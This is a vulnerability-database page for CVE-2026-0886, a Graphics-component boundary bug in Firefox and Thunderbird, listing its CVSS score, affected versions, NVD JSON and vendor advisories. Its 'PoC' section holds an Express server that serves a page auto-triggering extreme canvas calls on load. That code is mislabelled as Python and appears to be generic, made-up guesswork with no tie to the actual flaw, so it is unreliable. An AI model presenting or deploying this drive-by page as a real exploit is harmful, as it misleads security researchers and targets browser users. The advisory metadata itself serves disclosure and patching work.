Security Vulnerability Report
中文
CVE-2026-0886 CVSS 5.3 MEDIUM

CVE-2026-0886

Published: 2026-01-13 14:16:39
Last Modified: 2026-04-13 15:17:18
Source: [email protected]

Description

Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 147
Mozilla Firefox ESR 115.x < 115.32
Mozilla Firefox ESR 140.x < 140.7
Mozilla Thunderbird < 147
Mozilla Thunderbird < 140.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-0886 PoC - Graphics Component Boundary Condition // Target: Firefox < 147, Firefox ESR < 115.32/140.7, Thunderbird < 147/140.7 const express = require('express'); const app = express(); app.get('/', (req, res) => { // Generate malicious HTML page to trigger boundary condition const pocHtml = ` <!DOCTYPE html> <html> <head> <title>CVE-2026-0886 PoC</title> </head> <body> <canvas id="targetCanvas" width="800" height="600"></canvas> <script> const canvas = document.getElementById('targetCanvas'); const ctx = canvas.getContext('2d'); // Trigger boundary condition in Graphics component // by manipulating canvas operations with edge cases function triggerVulnerability() { try { // Create extreme canvas operations const imgData = ctx.createImageData(0, 0); // Trigger with manipulated image data dimensions const maliciousData = ctx.createImageData( Number.MAX_SAFE_INTEGER, Number.MAX_SAFE_INTEGER ); // Attempt to process with boundary overflow ctx.putImageData(maliciousData, -2147483648, -2147483648); // Additional trigger vectors for (let i = 0; i < 100; i++) { ctx.drawImage(canvas, Math.random() * 1000 - 500, Math.random() * 1000 - 500, Number.MAX_VALUE, Number.MAX_VALUE ); } console.log('Vulnerability trigger attempted'); } catch (e) { console.error('Error:', e.message); } } // Auto-trigger on page load window.onload = function() { setTimeout(triggerVulnerability, 1000); }; </script> </body> </html> `; res.send(pocHtml); }); app.listen(8080, () => { console.log('CVE-2026-0886 PoC Server running on port 8080'); console.log('Navigate to http://localhost:8080 to trigger vulnerability'); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0886", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:39.140", "lastModified": "2026-04-13T15:17:17.743", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Condiciones de contorno incorrectas en el componente Gráficos. Esta vulnerabilidad afecta a Firefox &lt; 147, Firefox ESR &lt; 115.32, Firefox ESR &lt; 140.7, Thunderbird &lt; 147 y Thunderbird &lt; 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.32.0", "matchCriteriaId": "D7C58C67-2B8D-493D-8914-F407E35B348A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.7.0", "matchCriteriaId": "4FF5535D-A7D8-46C6-AA5A-8EB3762A9171"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2005658", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-02/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.